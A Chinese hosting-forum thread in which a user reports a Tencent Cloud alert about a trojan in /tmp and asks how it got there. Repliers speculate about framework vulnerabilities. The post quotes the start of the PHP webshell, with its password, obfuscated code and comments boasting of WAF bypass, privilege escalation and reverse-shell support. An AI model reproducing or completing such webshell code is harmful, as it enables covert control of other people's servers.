腾讯云提醒：检测到存在木马文件-m556

时间：2022-03-07 19:06:20，检测到存在未处理的木马文件：/tmp/phpN*****，您的服务器疑似被黑客入侵，可能造成严重损失，请即刻前往主机安全控制台（https://console.cloud.tencent.com/cwp ）查看详细信息。

<?php
$password='admin';//登录密码

//本次更新：体积优化、压缩优化、命令优化、反弹优化、文件管理优化、挂马清马优化等大量功能细节优化。
//功能特色：PHP高版本低版本都能执行，文件短小精悍，方便上传，功能强大，提权无痕迹，无视waf，过安全狗、云锁、360、阿里云、护卫神等主流waf。同时支持菜刀、xise连接。

$html='$password'.'='."'".$password."';".'@e#html'.''.'v'."".''.''."".''.''.''

这是什么情况，请教mjj这是从哪能上传到/tmp文件夹下的。

木马已经清理了，但是不知道从哪传的。

热议
2楼 葬爱家族 昨天23:37

文件发出来帮你看看

3楼 m556 昨天23:42

文件发出来帮你看看

https://netcut.cn/1ftiglrfu

4楼 小号专用马甲 昨天23:44

你得说明你服务器什么系统 安装了什么软件
用的什么php程序
开了什么端口
你这样问 谁能猜明白

5楼 那都通 昨天23:45

就是一个很普通的大马 网站发出来看看

6楼 hcyme 昨天23:46

看来还是坐鸡干净利落，没什么码子

7楼 xc55 昨天23:47

同意楼上，建议把网站发出来

8楼 m556 昨天23:49

你得说明你服务器什么系统 安装了什么软件
用的什么php程序
开了什么端口

上的腾讯轻量的宝塔CentOS 7.9.2009(Py3.7.9)

9楼 m556 昨天23:50

就是一个很普通的大马 网站发出来看看

放了好几个站在上面

10楼 920 昨天23:50

用了什么程序吗，TP 或者 laravel框架？

12楼 那都通 10小时前

放了好几个站在上面

你只管发出来就行，我帮你看看洞在哪

13楼 tkzx 10小时前

我也有这样的，关键我啥服务都没有部署，只有探针

14楼 920 1小时前

用的都是laravel 8.7

那可能是其他程序的漏洞了，Laravel <= 8.4.2 存在远程代码漏洞

15楼 monface 半小时前

我也经常遇到这种提醒，用的WP，但是看的时候，提醒的路径下已经没该木马文件。

16楼 darius 27分钟前

又是php

17楼 c7r1st 19分钟前

/tmp/ 是临时文件，图片上传也会经过这里。

18楼 wang3y2 19分钟前

框架漏洞吧

19楼 商务布丁 18分钟前

确实是小马程序

20楼 达雅 15分钟前

同样问题遇到过，宝塔面板最新版 wp5.9系统php7.3 之前是没装wp没遇到过这个，装了后有报毒，以为是wp问题，但看你应该没装wp，那就只能是php这类的问题了，目前我装了个宝塔上面第三方免费nx的防火墙，效果还不错

申明：本文内容由网友收集分享，仅供学习参考使用。如文中内容侵犯到您的利益，请在文章下方留言，本站会第一时间进行处理。